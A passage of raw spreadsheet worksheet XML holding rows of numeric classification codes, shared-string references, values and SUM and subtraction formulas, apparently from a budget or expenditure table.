        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP868" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="869" ht="18" customHeight="1" spans="1:42">
      <c r="A869" s="10"/>
      <c r="B869" s="10"/>
      <c r="C869" s="28"/>
      <c r="D869" s="10">
        <v>2130126</v>
      </c>
      <c r="E869" s="16" t="s">
        <v>3655</v>
      </c>
      <c r="F869" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G869" s="17"/>
      <c r="H869" s="17"/>
      <c r="I869" s="17"/>
      <c r="J869" s="17"/>
      <c r="K869" s="17"/>
      <c r="L869" s="17"/>
      <c r="M869" s="17"/>
      <c r="N869" s="17"/>
      <c r="O869" s="17"/>
      <c r="P869" s="17"/>
      <c r="Q869" s="17"/>
      <c r="R869" s="17"/>
      <c r="S869" s="17"/>
      <c r="T869" s="17"/>
      <c r="U869" s="17"/>
      <c r="V869" s="17"/>
      <c r="W869" s="17"/>
      <c r="X869" s="17"/>
      <c r="Y869" s="17"/>
      <c r="Z869" s="17"/>
      <c r="AA869" s="17"/>
      <c r="AB869" s="17"/>
      <c r="AC869" s="17"/>
      <c r="AD869" s="17"/>
      <c r="AE869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP869" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="870" ht="18" customHeight="1" spans="1:42">
      <c r="A870" s="10"/>
      <c r="B870" s="10"/>
      <c r="C870" s="28"/>
      <c r="D870" s="10">
        <v>2130135</v>
      </c>
      <c r="E870" s="16" t="s">
        <v>3656</v>
      </c>
      <c r="F870" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G870" s="17"/>
      <c r="H870" s="17"/>
      <c r="I870" s="17"/>
      <c r="J870" s="17"/>
      <c r="K870" s="17"/>
      <c r="L870" s="17"/>
      <c r="M870" s="17"/>
      <c r="N870" s="17"/>
      <c r="O870" s="17"/>
      <c r="P870" s="17"/>
      <c r="Q870" s="17"/>
      <c r="R870" s="17"/>
      <c r="S870" s="17"/>
      <c r="T870" s="17"/>
      <c r="U870" s="17"/>
      <c r="V870" s="17"/>
      <c r="W870" s="17"/>
      <c r="X870" s="17"/>
      <c r="Y870" s="17"/>
      <c r="Z870" s="17"/>
      <c r="AA870" s="17"/>
      <c r="AB870" s="17"/>
      <c r="AC870" s="17"/>
      <c r="AD870" s="17"/>
      <c r="AE870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP870" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="871" ht="18" customHeight="1" spans="1:42">
      <c r="A871" s="10"/>
      <c r="B871" s="10"/>
      <c r="C871" s="28"/>
      <c r="D871" s="10">
        <v>2130142</v>
      </c>
      <c r="E871" s="16" t="s">
        <v>3657</v>
      </c>
      <c r="F871" s="14">
        <f t="shared" si="419"/>
        <v>1</v>
      </c>
      <c r="G871" s="17"/>
      <c r="H871" s="17">
        <v>10</v>
      </c>
      <c r="I871" s="17"/>
      <c r="J871" s="17"/>
      <c r="K871" s="17"/>
      <c r="L871" s="17">
        <v>1</v>
      </c>
      <c r="M871" s="17"/>
      <c r="N871" s="17"/>
      <c r="O871" s="17"/>
      <c r="P871" s="17"/>
      <c r="Q871" s="17"/>
      <c r="R871" s="17"/>
      <c r="S871" s="17"/>
      <c r="T871" s="17">
        <v>10</v>
      </c>
      <c r="U871" s="17"/>
      <c r="V871" s="17"/>
      <c r="W871" s="17"/>
      <c r="X871" s="17">
        <v>1</v>
      </c>
      <c r="Y871" s="17"/>
      <c r="Z871" s="17"/>
      <c r="AA871" s="17"/>
      <c r="AB871" s="17"/>
      <c r="AC871" s="17"/>
      <c r="AD871" s="17"/>
      <c r="AE871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP871" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="872" ht="18" customHeight="1" spans="1:42">
      <c r="A872" s="10"/>
      <c r="B872" s="10"/>
      <c r="C872" s="28"/>
      <c r="D872" s="10">
        <v>2130148</v>
      </c>
      <c r="E872" s="16" t="s">
        <v>3658</v>
      </c>
      <c r="F872" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G872" s="17"/>
      <c r="H872" s="17"/>
      <c r="I872" s="17"/>
      <c r="J872" s="17"/>
      <c r="K872" s="17"/>
      <c r="L872" s="17"/>
      <c r="M872" s="17"/>
      <c r="N872" s="17"/>
      <c r="O872" s="17"/>
      <c r="P872" s="17"/>
      <c r="Q872" s="17"/>
      <c r="R872" s="17"/>
      <c r="S872" s="17"/>
      <c r="T872" s="17"/>
      <c r="U872" s="17"/>
      <c r="V872" s="17"/>
      <c r="W872" s="17"/>
      <c r="X872" s="17"/>
      <c r="Y872" s="17"/>
      <c r="Z872" s="17"/>
      <c r="AA872" s="17"/>
      <c r="AB872" s="17"/>
      <c r="AC872" s="17"/>
      <c r="AD872" s="17"/>
      <c r="AE872" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF872" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG872" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH872" s="17">
        <f t="shared" ref="AH872:AP875" si="440">J872-V872</f>
        <v>0</v>
      </c>
      <c r="AI872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AJ872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AK872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AL872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AM872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AN872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AO872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AP872" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
    </row>
    <row r="873" ht="18" customHeight="1" spans="1:42">
      <c r="A873" s="10"/>
      <c r="B873" s="10"/>
      <c r="C873" s="28"/>
      <c r="D873" s="10">
        <v>2130152</v>
      </c>
      <c r="E873" s="16" t="s">
        <v>3659</v>
      </c>
      <c r="F873" s="14">
        <f t="shared" si="419"/>
        <v>1</v>
      </c>
      <c r="G873" s="17"/>
      <c r="H873" s="17"/>
      <c r="I873" s="17"/>
      <c r="J873" s="17"/>
      <c r="K873" s="17"/>
      <c r="L873" s="17">
        <v>1</v>
      </c>
      <c r="M873" s="17"/>
      <c r="N873" s="17"/>
      <c r="O873" s="17"/>
      <c r="P873" s="17"/>
      <c r="Q873" s="17"/>
      <c r="R873" s="17"/>
      <c r="S873" s="17"/>
      <c r="T873" s="17"/>
      <c r="U873" s="17"/>
      <c r="V873" s="17"/>
      <c r="W873" s="17"/>
      <c r="X873" s="17">
        <v>1</v>
      </c>
      <c r="Y873" s="17"/>
      <c r="Z873" s="17"/>
      <c r="AA873" s="17"/>
      <c r="AB873" s="17"/>
      <c r="AC873" s="17"/>
      <c r="AD873" s="17"/>
      <c r="AE873" s="17">
        <f t="shared" ref="AE873:AG875" si="441">G873-S873</f>
        <v>0</v>
      </c>
      <c r="AF873" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AG873" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AH873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AI873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AJ873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AK873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AL873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AM873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AN873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AO873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AP873" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
    </row>
    <row r="874" ht="18" customHeight="1" spans="1:42">
      <c r="A874" s="10"/>
      <c r="B874" s="10"/>
      <c r="C874" s="28"/>
      <c r="D874" s="10">
        <v>2130153</v>
      </c>
      <c r="E874" s="16" t="s">
        <v>3660</v>
      </c>
      <c r="F874" s="14">
        <f t="shared" si="419"/>
        <v>20</v>
      </c>
      <c r="G874" s="17"/>
      <c r="H874" s="17"/>
      <c r="I874" s="17"/>
      <c r="J874" s="17"/>
      <c r="K874" s="17"/>
      <c r="L874" s="17">
        <v>20</v>
      </c>
      <c r="M874" s="17"/>
      <c r="N874" s="17"/>
      <c r="O874" s="17"/>
      <c r="P874" s="17"/>
      <c r="Q874" s="17"/>
      <c r="R874" s="17"/>
      <c r="S874" s="17"/>
      <c r="T874" s="17"/>
      <c r="U874" s="17"/>
      <c r="V874" s="17"/>
      <c r="W874" s="17"/>
      <c r="X874" s="17">
        <v>20</v>
      </c>
      <c r="Y874" s="17"/>
      <c r="Z874" s="17"/>
      <c r="AA874" s="17"/>
      <c r="AB874" s="17"/>
      <c r="AC874" s="17"/>
      <c r="AD874" s="17"/>
      <c r="AE874" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AF874" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AG874" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AH874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AI874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AJ874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AK874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AL874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AM874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AN874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AO874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AP874" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
    </row>
    <row r="875" ht="18" customHeight="1" spans="1:42">
      <c r="A875" s="10"/>
      <c r="B875" s="10"/>
      <c r="C875" s="28"/>
      <c r="D875" s="10">
        <v>2130199</v>
      </c>
      <c r="E875" s="16" t="s">
        <v>3661</v>
      </c>
      <c r="F875" s="14">
        <f t="shared" si="419"/>
        <v>1045</v>
      </c>
      <c r="G875" s="17"/>
      <c r="H875" s="17">
        <v>1</v>
      </c>
      <c r="I875" s="17">
        <v>130</v>
      </c>
      <c r="J875" s="17">
        <v>131</v>
      </c>
      <c r="K875" s="17"/>
      <c r="L875" s="17">
        <v>55</v>
      </c>
      <c r="M875" s="17"/>
      <c r="N875" s="17"/>
      <c r="O875" s="17">
        <v>698</v>
      </c>
      <c r="P875" s="17"/>
      <c r="Q875" s="17">
        <v>18</v>
      </c>
      <c r="R875" s="17">
        <v>13</v>
      </c>
      <c r="S875" s="17"/>
      <c r="T875" s="17">
        <v>1</v>
      </c>
      <c r="U875" s="17"/>
      <c r="V875" s="17">
        <v>101</v>
      </c>
      <c r="W875" s="17"/>
      <c r="X875" s="17">
        <v>54</v>
      </c>
      <c r="Y875" s="17"/>
      <c r="Z875" s="17"/>
      <c r="AA875" s="17">
        <v>618</v>
      </c>
      <c r="AB875" s="17"/>
      <c r="AC875" s="17">
        <v>18</v>
      </c>
      <c r="AD875" s="17">
        <v>13</v>
      </c>
      <c r="AE875" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AF875" s="17">
        <f t="shared" si="441"/>
        <v>0</v>
      </c>
      <c r="AG875" s="17">
        <f t="shared" si="441"/>
        <v>130</v>
      </c>
      <c r="AH875" s="17">
        <f t="shared" si="440"/>
        <v>30</v>
      </c>
      <c r="AI875" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AJ875" s="17">
        <f t="shared" si="440"/>
        <v>1</v>
      </c>
      <c r="AK875" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AL875" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AM875" s="17">
        <f t="shared" si="440"/>
        <v>80</v>
      </c>
      <c r="AN875" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AO875" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
      <c r="AP875" s="17">
        <f t="shared" si="440"/>
        <v>0</v>
      </c>
    </row>
    <row r="876" ht="18" customHeight="1" spans="1:42">
      <c r="A876" s="10"/>
      <c r="B876" s="10"/>
      <c r="C876" s="28"/>
      <c r="D876" s="10">
        <v>21302</v>
      </c>
      <c r="E876" s="11" t="s">
        <v>3662</v>
      </c>
      <c r="F876" s="14">
        <f t="shared" si="419"/>
        <v>4</v>
      </c>
      <c r="G876" s="12">
        <f t="shared" ref="G876:R876" si="442">SUM(G877:G900)</f>
        <v>4</v>
      </c>
      <c r="H876" s="12">
        <f t="shared" si="442"/>
        <v>5</v>
      </c>
      <c r="I876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="J876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="K876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="L876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="M876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="N876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="O876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="P876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="Q876" s="12">
        <f t="shared" si="442"/>
        <v>0</v>
      </c>
      <c r="R876" s="12">
        <f t="shared" si="442"/>
        <v>4</v>
      </c>
      <c r="S876" s="12">
        <v>4</v>
      </c>
      <c r="T876" s="12">
        <v>3</v>
      </c>
      <c r="U876" s="12">
        <v>0</v>
      </c>
      <c r="V876" s="12">
        <v>0</v>
      </c>
      <c r="W876" s="12">
        <v>0</v>
      </c>
      <c r="X876" s="12">
        <v>0</v>
      </c>
      <c r="Y876" s="12">
        <v>0</v>
      </c>
      <c r="Z876" s="12">
        <v>0</v>
      </c>
      <c r="AA876" s="12">
        <v>0</v>
      </c>
      <c r="AB876" s="12">
        <v>0</v>
      </c>
      <c r="AC876" s="12">
        <v>0</v>
      </c>
      <c r="AD876" s="12">
        <v>4</v>
      </c>
      <c r="AE876" s="12">
        <f t="shared" ref="AE876:AP876" si="443">SUM(AE877:AE900)</f>
        <v>0</v>
      </c>
      <c r="AF876" s="12">
        <f t="shared" si="443"/>
        <v>2</v>
      </c>
      <c r="AG876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AH876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AI876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AJ876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AK876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AL876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AM876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AN876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AO876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
      <c r="AP876" s="12">
        <f t="shared" si="443"/>
        <v>0</v>
      </c>
    </row>
    <row r="877" ht="18" customHeight="1" spans="1:42">
      <c r="A877" s="10"/>
      <c r="B877" s="10"/>
      <c r="C877" s="28"/>
      <c r="D877" s="10">
        <v>2130201</v>
      </c>
      <c r="E877" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F877" s="14">
        <f t="shared" si="419"/>
        <v>4</v>
      </c>
      <c r="G877" s="17"/>
      <c r="H877" s="17"/>
      <c r="I877" s="17"/>
      <c r="J877" s="17"/>
      <c r="K877" s="17"/>
      <c r="L877" s="17"/>
      <c r="M877" s="17"/>
      <c r="N877" s="17"/>
      <c r="O877" s="17"/>
      <c r="P877" s="17"/>
      <c r="Q877" s="17"/>
      <c r="R877" s="17">
        <v>4</v>
      </c>
      <c r="S877" s="17"/>
      <c r="T877" s="17"/>
      <c r="U877" s="17"/>
      <c r="V877" s="17"/>
      <c r="W877" s="17"/>
      <c r="X877" s="17"/>
      <c r="Y877" s="17"/>
      <c r="Z877" s="17"/>
      <c r="AA877" s="17"/>
      <c r="AB877" s="17"/>
      <c r="AC877" s="17"/>
      <c r="AD877" s="17">
        <v>4</v>
      </c>
      <c r="AE877" s="17">
        <f t="shared" ref="AE877:AP898" si="444">G877-S877</f>
        <v>0</v>
      </c>
      <c r="AF877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AG877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AH877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AI877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AJ877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AK877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AL877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AM877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AN877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AO877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AP877" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
    </row>
    <row r="878" ht="18" customHeight="1" spans="1:42">
      <c r="A878" s="10"/>
      <c r="B878" s="10"/>
      <c r="C878" s="28"/>
      <c r="D878" s="10">
        <v>2130202</v>
      </c>
      <c r="E878" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F878" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G878" s="17"/>
      <c r="H878" s="17"/>
      <c r="I878" s="17"/>
      <c r="J878" s="17"/>
      <c r="K878" s="17"/>
      <c r="L878" s="17"/>
      <c r="M878" s="17"/>
      <c r="N878" s="17"/>
      <c r="O878" s="17"/>
      <c r="P878" s="17"/>
      <c r="Q878" s="17"/>
      <c r="R878" s="17"/>
      <c r="S878" s="17"/>
      <c r="T878" s="17"/>
      <c r="U878" s="17"/>
      <c r="V878" s="17"/>
      <c r="W878" s="17"/>
      <c r="X878" s="17"/>
      <c r="Y878" s="17"/>
      <c r="Z878" s="17"/>
      <c r="AA878" s="17"/>
      <c r="AB878" s="17"/>
      <c r="AC878" s="17"/>
      <c r="AD878" s="17"/>
      <c r="AE878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AF878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AG878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AH878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AI878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AJ878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AK878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AL878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AM878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AN878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AO878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AP878" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
    </row>
    <row r="879" ht="18" customHeight="1" spans="1:42">
      <c r="A879" s="10"/>
      <c r="B879" s="10"/>
      <c r="C879" s="28"/>
      <c r="D879" s="10">
        <v>2130203</v>
      </c>
      <c r="E879" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F879" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G879" s="17"/>
      <c r="H879" s="17"/>
      <c r="I879" s="17"/>
      <c r="J879" s="17"/>
      <c r="K879" s="17"/>
      <c r="L879" s="17"/>
      <c r="M879" s="17"/>
      <c r="N879" s="17"/>
      <c r="O879" s="17"/>
      <c r="P879" s="17"/>
      <c r="Q879" s="17"/>
      <c r="R879" s="17"/>
      <c r="S879" s="17"/>
      <c r="T879" s="17"/>
      <c r="U879" s="17"/>
      <c r="V879" s="17"/>
      <c r="W879" s="17"/>
      <c r="X879" s="17"/>
      <c r="Y879" s="17"/>
      <c r="Z879" s="17"/>
      <c r="AA879" s="17"/>
      <c r="AB879" s="17"/>
      <c r="AC879" s="17"/>
      <c r="AD879" s="17"/>
      <c r="AE879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AF879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AG879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AH879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AI879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AJ879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AK879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AL879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AM879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AN879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AO879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AP879" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
    </row>
    <row r="880" ht="18" customHeight="1" spans="1:42">
      <c r="A880" s="10"/>
      <c r="B880" s="10"/>
      <c r="C880" s="28"/>
      <c r="D880" s="10">
        <v>2130204</v>
      </c>
      <c r="E880" s="16" t="s">
        <v>3663</v>
      </c>
      <c r="F880" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G880" s="17"/>
      <c r="H880" s="17"/>
      <c r="I880" s="17"/>
      <c r="J880" s="17"/>
      <c r="K880" s="17"/>
      <c r="L880" s="17"/>
      <c r="M880" s="17"/>
      <c r="N880" s="17"/>
      <c r="O880" s="17"/>
      <c r="P880" s="17"/>
      <c r="Q880" s="17"/>
      <c r="R880" s="17"/>
      <c r="S880" s="17"/>
      <c r="T880" s="17"/>
      <c r="U880" s="17"/>
      <c r="V880" s="17"/>
      <c r="W880" s="17"/>
      <c r="X880" s="17"/>
      <c r="Y880" s="17"/>
      <c r="Z880" s="17"/>
      <c r="AA880" s="17"/>
      <c r="AB880" s="17"/>
      <c r="AC880" s="17"/>
      <c r="AD880" s="17"/>
      <c r="AE880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AF880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AG880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AH880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AI880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AJ880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AK880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AL880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AM880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AN880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AO880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AP880" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
    </row>
    <row r="881" ht="18" customHeight="1" spans="1:42">
      <c r="A881" s="10"/>
      <c r="B881" s="10"/>
      <c r="C881" s="28"/>
      <c r="D881" s="10">
        <v>2130205</v>
      </c>
      <c r="E881" s="16" t="s">
        <v>3664</v>
      </c>
      <c r="F881" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G881" s="17"/>
      <c r="H881" s="17"/>
      <c r="I881" s="17"/>
      <c r="J881" s="17"/>
      <c r="K881" s="17"/>
      <c r="L881" s="17"/>
      <c r="M881" s="17"/>
      <c r="N881" s="17"/>
      <c r="O881" s="17"/>
      <c r="P881" s="17"/>
      <c r="Q881" s="17"/>
      <c r="R881" s="17"/>
      <c r="S881" s="17"/>
      <c r="T881" s="17"/>
      <c r="U881" s="17"/>
      <c r="V881" s="17"/>
      <c r="W881" s="17"/>
      <c r="X881" s="17"/>
      <c r="Y881" s="17"/>
      <c r="Z881" s="17"/>
      <c r="AA881" s="17"/>
      <c r="AB881" s="17"/>
      <c r="AC881" s="17"/>
      <c r="AD881" s="17"/>
      <c r="AE881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AF881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AG881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AH881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AI881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AJ881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AK881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AL881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AM881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AN881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AO881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
      <c r="AP881" s="17">
        <f t="shared" si="444"/>
        <v>0</v>
      </c>
    </row>
    <row r="882" ht="18" customHeight="1" spans="1:42">
      <c r="A882" s="10"/>
      <c r="B882" s="10"/>
      <c r="C882" s="28"/>
      <c r="D882" s="10">
        <v>2130206</v>
      </c>
      <c r="E882" s="16" t="s">
        <v>3665</v>
      </c>
      <c r="F882" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G882" s="17"/>
      <c r="H882" s="17"/>
      <c r="I882" s="17"/>
      <c r="J882" s="17"/>
      <c r="K882" s="17"/>
